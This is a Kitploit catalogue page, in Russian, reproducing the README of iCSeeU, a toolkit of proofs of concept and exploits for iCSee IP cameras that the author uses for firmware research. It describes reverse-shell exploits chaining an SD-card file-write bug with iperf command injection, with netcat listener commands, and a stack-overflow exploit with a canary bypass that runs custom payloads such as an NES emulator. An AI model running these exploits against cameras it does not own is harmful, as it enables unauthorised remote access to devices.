Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
iCSeeU — Это набор инструментов/PoC/эксплойтов для камер, использующих приложение iCSee. И да — он может запускать игры NES! | Kitploit
Инструменты/GitHubGitHub/lr-m/icseeu
Безопасность встроенных системБезопасность IoTЭксплуатацияОбратная инженерияОтладчикиФаззингCTFАппаратная БезопасностьСтатьи и ИсследованияОбучение и ОбразованиеАнализ ПрошивокЭксплуатация Бинарных Файлов
1231 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHublr-m/icseeu

iCSeeU

Это набор инструментов/PoC/эксплойтов для камер, использующих приложение iCSee. И да — он может запускать игры NES!

Репозиторий

Это набор инструментов/PoC/эксплойтов, которые можно использовать для видеозвонков камер iCSee через локальную сеть (а возможно, и для камер без видеозвонков). Это можно легко использовать для прошивки альтернативных прошивок в качестве замены метода обновления через SD-карту.

Примечание: Любой эксплойт повреждения памяти будет работать только в том случае, если версия прошивки вашей камеры — V5.00.R02.000949U5.10000.141324.0000010 или V5.00.R02.000807E5.10000.346724.0000010 — эти эксплойты полагаются на фиксированные смещения, которые меняются при каждой сборке прошивки.

Блоги

[0] Разведка, разбор и извлечение прошивки

[1] Изучение языка камер

[2] Поиск бесполезных целочисленных переполнений + несколько полезных ошибок

[3] Смерть от переполнения стека + забавы с канарейками

[4] Эксплуатация всего и вся

[5] Другая камера, то же приложение

[6] Подтверждение + полный эксплойт повреждения памяти на второй камере

[7] Эмуляция игр NES на камере

Зависимости

  • pycryptodome : Для шифрования входа RSA
  • pwntools : Для шелл-кода
  • pyftpdlib : Для FTP-сервера
  • pynput : Для ввода с клавиатуры NES

Функциональность

get_system_info

Использует метод get_system_info для получения информации о камере через порт 34567.

python3 icseeu.py get_system_info
{
  "Name": "SystemInfo",
  "Ret": 100,
  "SessionID": "0x0001869f",
  "SystemInfo": {
    "AlarmInChannel": 0,
    "AlarmOutChannel": 0,
    "AudioInChannel": 1,
    "BuildTime": "2024-06-27 10:33:41",
    "CombineSwitch": 0,
    "DeviceModel": "IPC_GK7201V300_G2-WR-V_S38",
    "DeviceRunTime": "0x000026c6",
    "DeviceType": 7,
    "DigChannel": 0,
    "EncryptVersion": "Unknown",
    "ExtraChannel": 0,
    "HardWare": "IPC_GK7201V300_G2-WR-V_S38",
    "HardWareVersion": "Unknown",
    "Pid": "A909409U5000000N",
    "SerialNo": "bf7816d59506ec06",
    "SoftWareVersion": "V5.00.R02.000949U5.10000.141324.0000010",
    "TalkInChannel": 1,
    "TalkOutChannel": 1,
    "UpdataTime": "",
    "UpdataType": "0x00000000",
    "VideoInChannel": 1,
    "VideoOutChannel": 1
  }
}

ftp_get_logs

Использует оставшуюся текстовую функциональность для извлечения журналов с устройства (журналы оказываются в FTPTestDir/Test).

python3 icseeu.py ftp_get_logs

Эксплойты

gdb_revshell

Эксплуатирует уязвимость записи файлов на SD-карту и уязвимость выполнения бинарного файла iperf, что позволяет удаленно выполнить бинарный файл, находящийся на SD-карте, чтобы получить обратную оболочку и запустить отладчик GDB, который подключается к основному процессу App.

Терминал 1:

nc -l 1234

Терминал 2:

python3 icseeu.py gdb_revshell

Терминал 3:

gdb-multiarch
gef-remote 192.168.188.2 8888

Примечание: Не останавливайте программу более чем на 30 секунд, иначе сторожевой таймер сработает, и процесс App перезапустится!

Примечание 2: Возможно, вам потребуется изменить жестко заданные IP-адреса в полезной нагрузке (GDB_Revshell/remote_mgmt.c) на IP-адрес вашей машины в локальной сети и пересобрать полезную нагрузку.

gdb_revshell_inject

Эксплуатирует уязвимость записи файлов на SD-карту и уязвимость внедрения команд iperf, что позволяет удаленно выполнить бинарный файл, находящийся на SD-карте, чтобы получить обратную оболочку и запустить отладчик GDB, который подключается к основному процессу App.

Это полезно для устройств, на которых уже присутствует бинарный файл iperf, что препятствует использованию другого метода.

Терминал 1:

nc -l 1234

Терминал 2:

python3 icseeu.py gdb_revshell_inject

Терминал 3:

gdb-multiarch
gef-remote 192.168.188.2 8888

Примечание: Не останавливайте программу более чем на 30 секунд, иначе сторожевой таймер сработает, и процесс App перезапустится!

Примечание 2: Возможно, вам потребуется изменить жестко заданные IP-адреса в полезной нагрузке (GDB_Revshell/remote_mgmt.c) на IP-адрес вашей машины в локальной сети и пересобрать полезную нагрузку.

iperf_inject_exploit

Эксплуатирует внедрение команд iperf для установки обратной оболочки.

Терминал 1:

nc -l 1234

Терминал 2:

python3 icseeu.py iperf_inject_exploit

Примечание: Возможно, вам потребуется изменить жестко заданные IP-адреса в полезной нагрузке (Revshell_Inject/remote_mgmt.c) на IP-адрес вашей машины в локальной сети и пересобрать полезную нагрузку.

Эксплойт переполнения стека для GOKE GK7201

Это эксплойты для второго переполнения стека в обработчике сообщений типа 0x7d8. Это переполнение интересно тем, что позволяет обойти стековую канарейку и получить выполнение кода.

Вам потребуется собрать полезную нагрузку диспетчера, прежде чем они заработают (выполните make в каталоге PayloadDispatcher), и полезную нагрузку, которую вы хотите запустить на камере, выполнив make в соответствующих каталогах (например, ImageDisplay).

Примечания:

  • Версия прошивки камеры должна быть V5.00.R02.000949U5.10000.141324.0000010 (я не могу гарантировать, что она будет работать для других).

screenflash

Демонстрирует, что у нас есть выполнение кода, мигая экраном.

python3 icseeu.py exploit_goke screenflash

rgb

Демонстрирует, что у нас есть контроль над экраном, мигая цветами RGB.

python3 icseeu.py exploit_goke rgb

imagedisplay

Использует запись файла для загрузки сырого изображения RGB 5:6:5. Выполните ffmpeg -i image.jpg -vf scale=240:320 -c:v rawvideo -pix_fmt rgb565 -f rawvideo image.raw на изображении в каталоге, чтобы получить файл image.raw в каталоге ImageDisplay. Изображение будет отображено на экране.

python3 icseeu.py exploit_goke imagedisplay

buttontest

Демонстрирует, что мы можем считывать состояние кнопок: мигает цветом, когда обнаруживается нажатие одной из кнопок.

python3 icseeu.py exploit_goke buttontest

pong

Минимальная реализация игры Pong, которая демонстрирует, что у нас есть контроль над экраном и передними кнопками, а также демонстрирует немного более сложную полезную нагрузку.

python3 icseeu.py exploit_goke pong

nes

Перенесенный эмулятор NES, который может запускать rom.nes, помещенный в каталог GOKE_Payloads/nes. Выполните make в GOKE_Payloads/nes/smolnes и GOKE_Payload/nes для генерации бинарных файлов.

python3 icseeu.py exploit_goke nes

Эксплойт переполнения стека для XM530V200WX1

Скачать инструмент